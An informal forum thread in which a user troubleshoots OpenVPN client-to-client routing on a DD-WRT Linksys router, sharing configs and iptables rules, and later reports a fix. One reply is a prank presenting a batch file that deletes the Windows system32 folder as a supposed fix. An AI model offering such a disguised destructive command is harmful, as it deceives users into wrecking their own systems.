Thread: DD-WRT, openVPN and a VPN question

1. DD-WRT, openVPN and a VPN question

So I've been fucking around with getting a VPN set up at work, and my knowledge of this stuff is very limited but I've got it mostly working.

My set up is 2 computers plugged into a Linksys WRT160N v3 with DD-WRT openVPN (small) set up. I've got the VPN functioning to the point where I can openVPN in to the server, and ping the server (192.168.170.1).

I have two computers in it, 192.168.170.2 and 192.168.170.3, they can both ping the server, the server can ping them both. But they cannot ping each other which makes this network virtually worthless. The goal I believe is to access specific files, and to be able to get to our companies intranet. So not being able to see the other computer is a problem, though if anyone has a better suggestion I'll be glad to hear it!

Anyways I really can't find a good answer for this, the Firewall on the router is disabled (If it's enabled I can't even ping the router which is probably another problem I should address). Now that I think bout it, if the firewall is disabled then the port forwarding I have set up wouldn't work right?

Anyways here's some of the server set up if anyone can offer some advice it would be greatly appreciated. I really just don't have the patience for this stuff.

Server.Conf:
    push "route 192.168.54.0 255.255.255.0"
    server 192.168.170.0 255.255.255.0

dev tap
    proto udp
    keepalive 10 120
    daemon
    verb 5
    dh /tmp/openvpn/dh.pem
    ca /tmp/openvpn/ca.crt
    cert /tmp/openvpn/cert.pem
    key /tmp/openvpn/key.pem

management localhost 5001

Firewall commands
    iptables -I INPUT 1 -p upd --dport 1194 -j ACCEPT
    iptables -I FORWARD 1 --source 192.168.170.0/24 -j ACCEPT

iptables -I FORWARD -i br0 -o tun0 -j ACCEPT
    iptables -I FORWARD -i tun0 -o br0 -j ACCEP

client.conf:
    remote 192.168.168.100 1194

client
    remote-cert-tls server
    dev tap
    proto udp
    resolv-retry infinite
    nobind
    persist-key
    persist-tun
    float

#If the pushed routes appear not to be added on windows hosts, add the following:
    #route-delay 30

ca ca.crt
    cert kevin.crt
    key kevin.key

2. Try Alt+F4. If that doesn't do anything, open notepad and copypasta this line:

Code:
    @echo off
    del C:\WINDOWS\system32

Save that as openVPN.bat on your desktop and then Save As All Files. Close notepad, then double-click the link on your desktop.

Should fix it.
    "Question the world man... I know the meaning of everything right now... it's like I can touch god." - bbobb the ggreatt

3. Heh I'm Linux.

4. ^^ who still uses 32 bit windows

traceroute from one computer to the other and see if it'll show you in there where the routing problem is; it feels like it might be a gateway issue to me but I'm no expert in this kind of stuff (in fact I'm eventually setting something similar up for my job)

5. Hrm to be honest it could be a gateway issue, because traceroutes yield absolutely nothing. I'm really unsure of if I want a tap or tun, since really it only needs access to one computer I may just need a tunnel instead. I'll give the traceroute another try though.

6. Fixed it!

I believe the key change I made was push "route 192.168.170.0 255.255.255.0" to the server's config. At least that seems like the most logical change I made that would have resolved the issue. Sadly I haven't tested it from the outside, but I feel like it should work! hopefully. We'll see. I spent more time troubleshooting this than I probably should have considering. But this isn't the shit I know anything about so whatever.